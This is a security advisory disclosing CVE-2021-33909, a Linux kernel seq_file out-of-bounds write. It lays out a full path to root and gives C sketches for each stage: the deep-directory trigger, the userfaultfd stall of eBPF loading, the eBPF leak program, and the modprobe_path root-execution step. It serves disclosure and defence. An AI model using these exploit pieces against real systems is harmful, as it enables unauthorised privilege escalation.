Qualys Security Advisory

Sequoia: A deep root in Linux's filesystem layer (CVE-2021-33909)


========================================================================
Contents
========================================================================

Summary
Analysis
Exploitation overview
Exploitation details
Mitigations
Acknowledgments
Timeline


========================================================================
Summary
========================================================================

We discovered a size_t-to-int conversion vulnerability in the Linux
kernel's filesystem layer: by creating, mounting, and deleting a deep
directory structure whose total path length exceeds 1GB, an
unprivileged local attacker can write the 10-byte string "//deleted" to
an offset of exactly -2GB-10B below the beginning of a vmalloc()ated
kernel buffer.

We successfully exploited this uncontrolled out-of-bounds write, and
obtained full root privileges on default installations of Ubuntu 20.04,
Ubuntu 20.10, Ubuntu 21.04, Debian 11, and Fedora 34 Workstation; other
Linux distributions are certainly vulnerable, and probably exploitable.
Our exploit requires approximately 5GB of memory and 1M inodes; we will
publish it in the near future. A basic proof of concept (a crasher) is
attached to this advisory and is available at:

https://www.qualys.com/research/security-advisories/

To the best of our knowledge, this vulnerability was introduced in July
2014 (Linux 3.16) by commit 058504ed ("fs/seq_file: fallback to vmalloc
allocation").


========================================================================
Analysis
========================================================================

The Linux kernel's seq_file interface produces virtual files that
contain sequences of records (for example, many files in /proc are
seq_files, and records are usually lines). Each record must fit into a
seq_file buffer, which is therefore enlarged as needed, by doubling its
size at line 242 (seq_buf_alloc() is a simple wrapper around
kvmalloc()):

------------------------------------------------------------------------
168 ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter)
169 {
170         struct seq_file *m = iocb->ki_filp->private_data;
...
205         /* grab buffer if we didn't have one */
206         if (!m->buf) {
207                 m->buf = seq_buf_alloc(m->size = PAGE_SIZE);
...
210         }
...
220         // get a non-empty record in the buffer
...
223         while (1) {
...
227                 err = m->op->show(m, p);
...
236                 if (!seq_has_overflowed(m)) // got it
237                         goto Fill;
238                 // need a bigger buffer
...
240                 kvfree(m->buf);
...
242                 m->buf = seq_buf_alloc(m->size <<= 1);
...
246         }
------------------------------------------------------------------------

This size multiplication is not a vulnerability in itself, because
m->size is a size_t (an unsigned 64-bit integer, on x86_64), and the
system would run out of memory long before this multiplication
overflows the integer m->size.
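Concretely, these buffer sizes are always powers of two: starting from
PAGE_SIZE (4KB), the first size large enough to hold a record longer
than 1GB is reached after 19 doublings and is exactly 2GB (2^31) -- a
value that fits comfortably in a size_t, but not in a signed 32-bit
int. The following user-space snippet (purely illustrative, not kernel
code) reproduces this arithmetic:

------------------------------------------------------------------------
/* Illustrative only: reproduce the seq_file buffer-size arithmetic in
 * user space. Starting from PAGE_SIZE, m->size doubles until the
 * buffer can hold a record larger than 1GB; the first such size is
 * exactly 2GB, which is harmless as a size_t but becomes INT_MIN when
 * converted to an int (implementation-defined; gcc/x86_64 wraps). */
#include <stdio.h>

int main(void)
{
    size_t size = 4096;                 /* PAGE_SIZE */
    int doublings = 0;

    while (size <= ((size_t)1 << 30)) { /* until a >1GB record fits */
        size <<= 1;                     /* m->buf = seq_buf_alloc(m->size <<= 1); */
        doublings++;
    }

    printf("%d doublings, size = %zu\n", doublings, size); /* 19, 2147483648 */
    printf("as an int: %d\n", (int)size);                  /* -2147483648 */
    return 0;
}
------------------------------------------------------------------------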
Unfortunately, this size_t is also passed to functions whose size
argument is an int (a signed 32-bit integer), not a size_t. For
example, the show_mountinfo() function (which is called at line 227 to
format the records in /proc/self/mountinfo) calls seq_dentry() (at line
150), which calls dentry_path() (at line 530), which calls prepend()
(at line 387):

------------------------------------------------------------------------
135 static int show_mountinfo(struct seq_file *m, struct vfsmount *mnt)
136 {
...
150         seq_dentry(m, mnt->mnt_root, " \t\n\\");
------------------------------------------------------------------------
523 int seq_dentry(struct seq_file *m, struct dentry *dentry, const char *esc)
524 {
525         char *buf;
526         size_t size = seq_get_buf(m, &buf);
...
529         if (size) {
530                 char *p = dentry_path(dentry, buf, size);
------------------------------------------------------------------------
380 char *dentry_path(struct dentry *dentry, char *buf, int buflen)
381 {
382         char *p = NULL;
...
385         if (d_unlinked(dentry)) {
386                 p = buf + buflen;
387                 if (prepend(&p, &buflen, "//deleted", 10) != 0)
------------------------------------------------------------------------
 11 static int prepend(char **buffer, int *buflen, const char *str, int namelen)
 12 {
 13         *buflen -= namelen;
 14         if (*buflen < 0)
 15                 return -ENAMETOOLONG;
 16         *buffer -= namelen;
 17         memcpy(*buffer, str, namelen);
------------------------------------------------------------------------

As a result, if an unprivileged local attacker creates, mounts, and
deletes a deep directory structure whose total path length exceeds 1GB,
and if the attacker open()s and read()s /proc/self/mountinfo, then:

- in seq_read_iter(), a 2GB buffer is vmalloc()ated (line 242), and
  show_mountinfo() is called (line 227);

- in show_mountinfo(), seq_dentry() is called with the empty 2GB buffer
  (line 150);

- in seq_dentry(), dentry_path() is called with a 2GB size (line 530);

- in dentry_path(), the int buflen is therefore negative (INT_MIN,
  -2GB), p points to an offset of -2GB below the vmalloc()ated buffer
  (line 386), and prepend() is called (line 387);

- in prepend(), *buflen is decreased by 10 bytes and becomes a large
  but positive int (line 13), *buffer is decreased by 10 bytes and
  points to an offset of -2GB-10B below the vmalloc()ated buffer (line
  16), and the 10-byte string "//deleted" is written out of bounds
  (line 17).
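A user-space trigger for this sequence might look roughly as follows (a
heavily simplified sketch, not the proof of concept attached to this
advisory: error handling, the uid/gid maps of the new user namespace,
mount propagation, and the rmdir() walk back up are all omitted, and
the mount point /tmp/mnt is an arbitrary, pre-existing directory):

------------------------------------------------------------------------
/* Simplified sketch of the user-space trigger (not the attached PoC).
 * Omitted: error handling, uid/gid maps for the new user namespace,
 * mount propagation details, and the rmdir() walk back up the tree.
 * /tmp/mnt is an arbitrary, pre-existing directory. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void)
{
    char name[256];
    memset(name, '\\', 255);    /* 255 backslashes: each one is escaped  */
    name[255] = '\0';           /* to "\134" (4 bytes) by show_mountinfo() */

    /* create roughly 1M nested directories (enough for the escaped path
     * to exceed 1GB); chdir() into each component to stay below the
     * PATH_MAX limit of a single mkdir() argument */
    for (int i = 0; i < 1024 * 1024; i++) {
        mkdir(name, 0700);
        chdir(name);
    }

    /* bind-mount the deep directory in a new user + mount namespace */
    unshare(CLONE_NEWUSER | CLONE_NEWNS);
    mount(".", "/tmp/mnt", NULL, MS_BIND, NULL);

    /* rmdir() the directories (walk back up, omitted), so that the
     * bind-mounted dentry becomes unlinked, i.e. "//deleted" ... */

    /* ... then read /proc/self/mountinfo: the kernel builds the >1GB
     * record, doubles the seq_file buffer to 2GB, and performs the
     * out-of-bounds write described above */
    char buf[65536];
    int fd = open("/proc/self/mountinfo", O_RDONLY);
    while (read(fd, buf, sizeof(buf)) > 0)
        ;
    return 0;
}
------------------------------------------------------------------------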
========================================================================
Exploitation overview
========================================================================

1/ We mkdir() a deep directory structure (roughly 1M nested
   directories) whose total path length exceeds 1GB, we bind-mount it
   in an unprivileged user namespace, and rmdir() it.

2/ We create a thread that vmalloc()ates a small eBPF program (via
   BPF_PROG_LOAD), and we block this thread (via userfaultfd or FUSE)
   after our eBPF program has been validated by the kernel eBPF
   verifier but before it is JIT-compiled by the kernel.

3/ We open() /proc/self/mountinfo in our unprivileged user namespace,
   and start read()ing the long path of our bind-mounted directory,
   thereby writing the string "//deleted" to an offset of exactly
   -2GB-10B below the beginning of a vmalloc()ated buffer.

4/ We arrange for this "//deleted" string to overwrite an instruction
   of our validated eBPF program (and therefore nullify the security
   checks of the kernel eBPF verifier), and transform this uncontrolled
   out-of-bounds write into an information disclosure, and into a
   limited but controlled out-of-bounds write.

5/ We transform this limited out-of-bounds write into an arbitrary read
   and write of kernel memory, by reusing Manfred Paul's beautiful btf
   and map_push_elem techniques from:

   https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification

6/ We use this arbitrary read to locate the modprobe_path[] buffer in
   kernel memory, and use the arbitrary write to replace the contents
   of this buffer ("/sbin/modprobe" by default) with a path to our own
   executable, thus obtaining full root privileges.


========================================================================
Exploitation details
========================================================================

a/ We create a directory whose total path length exceeds 1GB: in
   theory, we need to create over 1GB/256B=4M nested directories (a
   path component is at most NAME_MAX=255 bytes long, plus a '/'
   separator); in practice, show_mountinfo() escapes each '\' character
   of our long path as the 4-character string "\134" (because '\'
   belongs to the esc string passed to seq_dentry() at line 150), and
   we therefore need to create only 1M nested directories.

b/ We fill all large vmalloc holes: we bind-mount (MS_BIND) various
   parts of our long directory in several unprivileged user namespaces,
   and vmalloc()ate large seq_file buffers by read()ing
   /proc/self/mountinfo. For example, we vmalloc()ate 768MB of large
   buffers in our exploit.

c/ We vmalloc()ate two 1GB buffers and one 2GB buffer (by bind-mounting
   our long directory in three different user namespaces, and by
   read()ing /proc/self/mountinfo), and we check that "//deleted" is
   indeed written to an offset of -2GB-10B below the beginning of our
   2GB buffer (i.e., 8182B above the beginning of our first 1GB buffer
   -- the "XXX"s are guard pages):

        "//deleted"
             |
      4KB    v   1GB        4KB        1GB        4KB        2GB
-----|---|---+-------------|---|-----------------|---|-----------------|
 ... |XXX| seq_file buffer |XXX| seq_file buffer |XXX| seq_file buffer |
-----|---|---+-------------|---|-----------------|---|-----------------|
             |                                       |
             \----<----<----<----<----<----<----<---/
           8182B              -2GB-10B

d/ We fill all small vmalloc holes: we vmalloc()ate various small
   socket buffers by send()ing numerous NETLINK_USERSOCK messages. For
   example, we vmalloc()ate 256MB of small buffers in our exploit.

e/ We create 1024 user-space threads; each thread starts loading an
   eBPF program into the kernel, but (via userfaultfd or FUSE) we block
   every thread in kernel space (at line 2101), before our eBPF
   programs are actually vmalloc()ated (at line 2162):

------------------------------------------------------------------------
2076 static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
2077 {
....
2100         /* copy eBPF program license from user space */
2101         if (strncpy_from_user(license, u64_to_user_ptr(attr->license),
....
2161         /* plain bpf_prog allocation */
2162         prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
------------------------------------------------------------------------
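One way to park a thread at line 2101 (step e/ above) is to make the
license copy itself fault: if attr.license points into a
userfaultfd-registered page that has never been faulted in, then
strncpy_from_user() sleeps in the fault handler until we decide to
resolve the fault (FUSE can be used to the same effect). A simplified
sketch of this technique (error handling and the eBPF instructions
themselves are omitted):

------------------------------------------------------------------------
/* Simplified sketch: stall bpf(BPF_PROG_LOAD) inside strncpy_from_user()
 * (line 2101) by pointing attr.license at a never-faulted page that is
 * registered with userfaultfd. Error handling and the program's
 * instructions are omitted; FUSE can be used instead of userfaultfd. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/bpf.h>
#include <linux/userfaultfd.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

static void *blocking_page(void)
{
    long uffd = syscall(SYS_userfaultfd, O_CLOEXEC);
    struct uffdio_api api = { .api = UFFD_API };
    ioctl(uffd, UFFDIO_API, &api);

    void *page = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    struct uffdio_register reg = {
        .range = { .start = (unsigned long)page, .len = 4096 },
        .mode  = UFFDIO_REGISTER_MODE_MISSING,
    };
    ioctl(uffd, UFFDIO_REGISTER, &reg);

    /* nobody services this userfaultfd: the first access to the page,
     * from user or kernel space, blocks until we UFFDIO_COPY it */
    return page;
}

int main(void)
{
    union bpf_attr attr;
    memset(&attr, 0, sizeof(attr));
    /* attr.prog_type, attr.insns, attr.insn_cnt, etc. omitted */
    attr.license = (unsigned long)blocking_page();

    /* blocks at the license copy (line 2101), i.e. before the program
     * is even allocated by bpf_prog_alloc() (line 2162) */
    syscall(SYS_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
    return 0;
}
------------------------------------------------------------------------

Unblocking such a thread is then just a matter of resolving the pending
fault (UFFDIO_COPY) from another thread.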
f/ We vfree() our first 1GB seq_file buffer (where "//deleted" was
   written out of bounds), and we immediately unblock all 1024 threads;
   our eBPF programs are vmalloc()ated into the 1GB hole that we just
   vfree()d:

      4KB        1GB        4KB        1GB        4KB        2GB
-----|---|-----------------|---|-----------------|---|-----------------|
 ... |XXX|  eBPF programs  |XXX| seq_file buffer |XXX| seq_file buffer |
-----|---|-----------------|---|-----------------|---|-----------------|

g/ Next, (again via userfaultfd or FUSE) we block one of our threads
   (at line 12795) after its eBPF program has been validated by the
   kernel eBPF verifier but before it is JIT-compiled by the kernel:

------------------------------------------------------------------------
12640 int bpf_check(struct bpf_prog **prog, union bpf_attr *attr,
12641               union bpf_attr __user *uattr)
12642 {
.....
12795         print_verification_stats(env);
------------------------------------------------------------------------

h/ Last, we overwrite an instruction of this eBPF program with an
   out-of-bounds "//deleted" string (again via our 2GB seq_file
   buffer), and therefore nullify the security checks of the kernel
   eBPF verifier:

        "//deleted"
             |
      4KB    v   1GB        4KB        1GB        4KB        2GB
-----|---|---+-------------|---|-----------------|---|-----------------|
 ... |XXX|  eBPF programs  |XXX| seq_file buffer |XXX| seq_file buffer |
-----|---|---+-------------|---|-----------------|---|-----------------|
             |                                       |
             \----<----<----<----<----<----<----<---/
           8182B              -2GB-10B

First, we transform this uncontrolled eBPF-program corruption into an
information disclosure. Our first, uncorrupted eBPF program is deemed
safe by the kernel eBPF verifier ("storage" and "control" are two basic
BPF_MAP_TYPE_ARRAYs, readable and writable from user space via
BPF_MAP_LOOKUP_ELEM and BPF_MAP_UPDATE_ELEM):

- BPF_LD_IMM64_RAW(BPF_REG_2, BPF_PSEUDO_MAP_VALUE, storage) loads the
  address of our storage map (which resides in kernel space and whose
  address is unknown to us) into the eBPF register BPF_REG_2;

- BPF_MOV64_IMM(BPF_REG_2, 0) immediately replaces the contents of
  BPF_REG_2 (the address of our storage map) with the constant value 0;

- BPF_LD_IMM64_RAW(BPF_REG_3, BPF_PSEUDO_MAP_VALUE, control) loads the
  address of our control map into BPF_REG_3;

- BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0) stores the contents of
  BPF_REG_2 (the constant value 0) into our control map.

However, our eBPF-program corruption overwrites the instruction
BPF_MOV64_IMM(BPF_REG_2, 0) with the 8-byte string "deleted", which
translates into the instruction BPF_ALU32_IMM(BPF_LSH, BPF_REG_5,
0x74): a NOP ("no operation"), because our program does not use
BPF_REG_5. As a result, we do not store the constant value 0 into our
control map: instead, we store and disclose the address of our storage
map.

(This information disclosure allowed us to greatly reduce the number of
hardcoded kernel offsets in our exploit: our Ubuntu 20.04 exploit
worked out of the box on Ubuntu 20.10, Ubuntu 21.04, Debian 11, and
Fedora 34.)
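For reference, this first program might be assembled along the
following lines, using the BPF_*() instruction macros (as found, for
example, in the kernel's samples/bpf/bpf_insn.h). This is a sketch, not
the exploit's source: storage_fd and control_fd stand for the file
descriptors of the two arrays, and the final two instructions ("return
0") are only there to make the program complete:

------------------------------------------------------------------------
/* Sketch of the uncorrupted "information disclosure" program, using
 * the BPF_*() insn macros (e.g. samples/bpf/bpf_insn.h). storage_fd
 * and control_fd are the fds of the two BPF_MAP_TYPE_ARRAYs; the
 * trailing "r0 = 0; exit" is added only to make the program complete. */
struct bpf_insn insns[] = {
    /* r2 = &storage[0] (a kernel address, unknown to user space) */
    BPF_LD_IMM64_RAW(BPF_REG_2, BPF_PSEUDO_MAP_VALUE, storage_fd),

    /* r2 = 0 -- the instruction that the out-of-bounds "deleted" write
     * later turns into a harmless shift of the unused BPF_REG_5 */
    BPF_MOV64_IMM(BPF_REG_2, 0),

    /* r3 = &control[0] */
    BPF_LD_IMM64_RAW(BPF_REG_3, BPF_PSEUDO_MAP_VALUE, control_fd),

    /* control[0] = r2: 0 if the program is intact, the kernel address
     * of storage[0] if the BPF_MOV64_IMM() above has been corrupted */
    BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0),

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};
------------------------------------------------------------------------

After the program has run, a BPF_MAP_LOOKUP_ELEM on the control map
from user space returns either 0 (program intact) or the disclosed
kernel address of our storage map.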
Second, we transform our uncontrolled eBPF-program corruption into a
limited but controlled out-of-bounds write. Our second, uncorrupted
eBPF program is also deemed safe by the kernel eBPF verifier ("corrupt"
is a 3*64KB BPF_MAP_TYPE_ARRAY):

- BPF_LD_IMM64_RAW(BPF_REG_4, BPF_PSEUDO_MAP_VALUE, corrupt) loads the
  address of our corrupt map into BPF_REG_4;

- BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 3*64KB/2) points BPF_REG_4 to the
  middle of our corrupt map;

- BPF_ALU64_IMM(BPF_SUB, BPF_REG_4, 3*64KB/4) points BPF_REG_4 to the
  first quarter of our corrupt map;

- BPF_LD_IMM64_RAW(BPF_REG_3, BPF_PSEUDO_MAP_VALUE, control) loads the
  address of our control map into BPF_REG_3;

- BPF_LDX_MEM(BPF_H, BPF_REG_7, BPF_REG_3, 0) loads a variable 16-bit
  offset from our control map into BPF_REG_7;

- BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_7) adds BPF_REG_7 (our
  variable 16-bit offset) to BPF_REG_4, which therefore points safely
  within the bounds of our corrupt map (because BPF_REG_7 is in the
  [0,64KB] range).

However, our eBPF-program corruption overwrites the instruction
BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 3*64KB/2) with the string "deleted",
which translates into BPF_ALU32_IMM(BPF_LSH, BPF_REG_5, 0x74) (a NOP).
As a result, the following BPF_ALU64_IMM(BPF_SUB, BPF_REG_4, 3*64KB/4)
points BPF_REG_4 out of bounds and allows us to read from and write to
the struct bpf_map that precedes our corrupt map in kernel space.

Finally, we transform this limited out-of-bounds read and write into an
arbitrary read and write of kernel memory, by reusing Manfred Paul's
btf and map_push_elem techniques:

- With the arbitrary kernel read we locate the symbol
  "__request_module" and hence the function __request_module(),
  disassemble this function, and extract the address of modprobe_path[]
  from the instructions for "if (!modprobe_path[0])".

- With the arbitrary kernel write we overwrite the contents of
  modprobe_path[] ("/sbin/modprobe" by default) with a path to our own
  executable, and call request_module() (by creating a netlink socket),
  which executes modprobe_path, and hence our own executable, as root.
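This last step is the classic modprobe_path technique. Once the
arbitrary write has replaced "/sbin/modprobe" with the path of our own
program, any request_module() call runs that program as root; the
sketch below (with illustrative paths and an arbitrarily chosen,
unregistered netlink protocol; the kernel write itself is not shown)
triggers it by creating a netlink socket, exactly as described above:

------------------------------------------------------------------------
/* Sketch of the modprobe_path trigger (the arbitrary kernel write that
 * sets modprobe_path[] = "/tmp/x" is not shown). /tmp/x, /tmp/proof
 * and the netlink protocol number are illustrative choices. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/stat.h>

int main(void)
{
    /* the program that the kernel will run as root instead of
     * /sbin/modprobe; here it merely records who executed it */
    FILE *f = fopen("/tmp/x", "w");
    fputs("#!/bin/sh\nid > /tmp/proof 2>&1\n", f);
    fclose(f);
    chmod("/tmp/x", 0755);

    /* ... here, the arbitrary write sets modprobe_path[] = "/tmp/x" ... */

    /* creating a netlink socket with an unregistered protocol makes the
     * kernel call request_module("net-pf-16-proto-<n>"), which executes
     * modprobe_path -- now /tmp/x -- with full root privileges */
    socket(AF_NETLINK, SOCK_RAW, 31 /* an unregistered NETLINK_* protocol */);

    return system("cat /tmp/proof");    /* "uid=0(root) ..." if it worked */
}
------------------------------------------------------------------------

Note that no capability is required to reach request_module() here: the
netlink protocol is simply unknown to the kernel, so the kernel itself
invokes its modprobe helper on our behalf.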
========================================================================
Mitigations
========================================================================

Important note: the following mitigations prevent only our specific
exploit from working (but other exploitation techniques may exist); to
completely fix this vulnerability, the kernel must be patched.

- Set /proc/sys/kernel/unprivileged_userns_clone to 0, to prevent an
  attacker from mounting a long directory in a user namespace. However,
  the attacker may mount a long directory via FUSE instead; we have not
  fully explored this possibility, because we accidentally stumbled
  upon CVE-2021-33910 in systemd: if an attacker FUSE-mounts a long
  directory (longer than 8MB), then systemd exhausts its stack,
  crashes, and therefore crashes the entire operating system (a kernel
  panic).

- Set /proc/sys/kernel/unprivileged_bpf_disabled to 1, to prevent an
  attacker from loading an eBPF program into the kernel. However, the
  attacker may corrupt other vmalloc()ated objects instead (for
  example, thread stacks), but we have not investigated this
  possibility.


========================================================================
Acknowledgments
========================================================================

We thank the PaX Team for answering our many questions about the Linux
kernel.

We also thank Manfred Paul, Jann Horn, Brandon Azad, Simon Scannell,
and Bruce Leidl for their exploits and write-ups:

https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification
https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html
https://googleprojectzero.blogspot.com/2020/12/an-ios-hacker-tries-android.html
https://scannell.io/posts/ebpf-fuzzing/
https://github.com/brl/grlh

We thank Red Hat Product Security and the members of
linux-distros@openwall and security@kernel.org for their work on this
coordinated disclosure. We also thank Mitre's CVE Assignment Team.

Finally, we thank Marco Ivaldi for his continued support.


========================================================================
Timeline
========================================================================

2021-06-09: We sent our advisories for CVE-2021-33909 and CVE-2021-33910
to Red Hat Product Security (the two vulnerabilities are closely
related and the systemd-security mailing list is hosted by Red Hat).

2021-07-06: We sent our advisories, and Red Hat sent the patches they
wrote, to the linux-distros@openwall mailing list.

2021-07-13: We sent our advisory for CVE-2021-33909, and Red Hat sent
the patch they wrote, to the security@kernel.org mailing list.

2021-07-20: Coordinated Release Date (12:00 PM UTC).